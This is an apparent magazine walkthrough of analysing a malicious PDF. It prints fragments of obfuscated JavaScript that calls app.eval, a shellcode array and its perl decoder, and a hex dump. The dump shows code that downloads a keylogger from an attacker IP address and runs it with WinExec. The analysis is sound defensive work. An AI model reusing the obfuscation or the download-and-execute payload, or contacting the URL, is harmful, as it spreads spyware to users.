In association with heise online


There are whole sequences of objects containing the tag /Filter /FlateDecode, followed by binary data contained between stream and endstream. My book tells me that simple binary data in hex format is marked by /ASCIIHexDecode. FlatDecode, by contrast, means that the data needs to be unzipped using the zlib library.

Fortunately, I don't need to reinvent the wheel to do this. Stuart's book includes a PDF toolkit able to do pretty much anything you need to a PDF file, such as removing single pages, reading encrypted PDFs (password still required) or generating an uncompressed version using

$ pdftk NTFS-internals.pdf output plain.txt uncompress.

This inflates the file from 15 to 38 KB. But now I at least have a chance of working out what's going on. In 'plain.txt', I skip past pages of formatting-related columns of figures, a few JPEG images and font instructions. But hold on. Back a bit – I think I've found something. The stream in object 62 looks a lot like JavaScript:

this.nfMZkYrtz='nfMZkYrtz';var lookYears = 'var t';

Of course – I remember that PDF files can contain JavaScript. A closer look and I twig that the strings assigned to the variables are themselves snippets of JavaScript. var t, for example, ends up in lookYears, and a little further down the keyword new is assigned to duringFactIf. The point of this becomes clear as I check out object 63, which contains further JavaScript:

var out = '' + lookYears+

OK – so code is being assembled in the out variable. Further down, in object 65, comes what looks like an attempt to call this code:

function fBE1wMund0(){}

The odd-looking fBE1wMund0(){} function is just a diversion. But I'll bet ex is intended to run the JavaScript function eval() in order to execute the assembled code.

But I'm starting to think that disentangling the heavily nested obfuscation functions is getting to be too dumb – that, after all, is what SpiderMonkey is for. So I extract all the JavaScript fragments into a file. To see what it's supposed to execute, I replace the ex["e"+"val"](out); with a harmless print command and, half-an hour later, throw it to the JavaScript monkey.

Inevitably it comes a cropper on the first try: "ReferenceError: app is not defined". The stumbling block proves to be the line

var ex = app;

And now the penny drops – ex is nothing less than a reference to Adobe Reader itself, which can be accessed from within a PDF file by using app. The ex["eval"](out) code snippet is thus a somewhat eccentric, but valid way of writing app.eval – it is indeed an attempt to execute the code.

Of course SpiderMonkey isn't familiar with app. Since I've removed the eval statement anyway, I can, however, simply comment out the problem string allocation. The second attempt works like a charm and SpiderMonkey spits out more JavaScript, which I write to another file.

Near the start, a field containing more than 1,000 oddly-formatted Unicode escape sequences is generated:

var wly56uG4w = new Array("%u535","0%u525",    

This looks a lot like shell code to me, obviously intended to be injected and executed via a security vulnerability. To firm up my suspicions, I concatenate the string and interpret the whole thing as hexadecimal code using

perl -pe 's/\%u(..)(..)/chr(hex($2)).chr(hex($1))/ge'

As I check the code generated in a hex editor, I find definitive proof that there's bad shit going down.

00000150 00 00 00 00 00 00 00 00 00 00 00 00 00 00 47 65 |..............Ge|
00000160 74 54 65 6d 70 50 61 74 68 41 00 4c 6f 61 64 4c |tTempPathA.LoadL|
00000170 69 62 72 61 72 79 41 00 47 65 74 50 72 6f 63 41 |ibraryA.GetProcA|
00000180 64 64 72 65 73 73 00 57 69 6e 45 78 65 63 00 bb |ddress.WinExec.?|
00000190 89 f2 89 f7 30 c0 ae 75 fd 29 f7 89 f9 31 c0 be |.?.?0??u?)?.?1??|
00000230 00 56 57 e8 58 ff ff ff 5f 5e ab 01 ce 80 3e bb |.VW?X???_^?.?.>?|
00000240 74 02 eb ed c3 55 52 4c 4d 4f 4e 2e 44 4c 4c 00 |t.???URLMON.DLL.|
00000250 55 52 4c 44 6f 77 6e 6c 6f 61 64 54 6f 46 69 6c |URLDownloadToFil|
00000260 65 41 00 75 70 64 61 74 65 2e 65 78 65 00 63 72 ||
00000270 61 73 68 2e 70 68 70 00 68 74 74 70 3a 2f 2f 32 |ash.php.http://2|
00000280 31 30 2e 35 31 2e 31 38 37 2e 34 35 2f 6c 69 62 ||
00000290 2f 75 70 64 61 74 65 2e 70 68 70 3f 69 64 3d 30 |/update.php?id=0|
000002a0 00 90 |..|

The emerging URL points to a file which Virustotal's bank of anti-virus software unanimously diagnoses as concealing a key logger. The code appears to try to save the key logger to the Temp folder as 'update.exe' and execute it using WinExec. But has it succeeded in infecting my system? Since, according to Virustotal, my anti-virus software detects this piece of spyware, it should have warned me if it had succeeded in penetrating the system.

But there are two more arrays of shell code. Analysing them throws up the same URL, but with the parameters 'id=1' and 'id=2' respectively. This suggests other pieces of malware can also be downloaded.

Next: The repertoire

Print Version | Permalink:
  • Twitter
  • Facebook
  • submit to slashdot
  • StumbleUpon
  • submit to reddit

  • July's Community Calendar

The H Open

The H Security

The H Developer

The H Internet Toolkit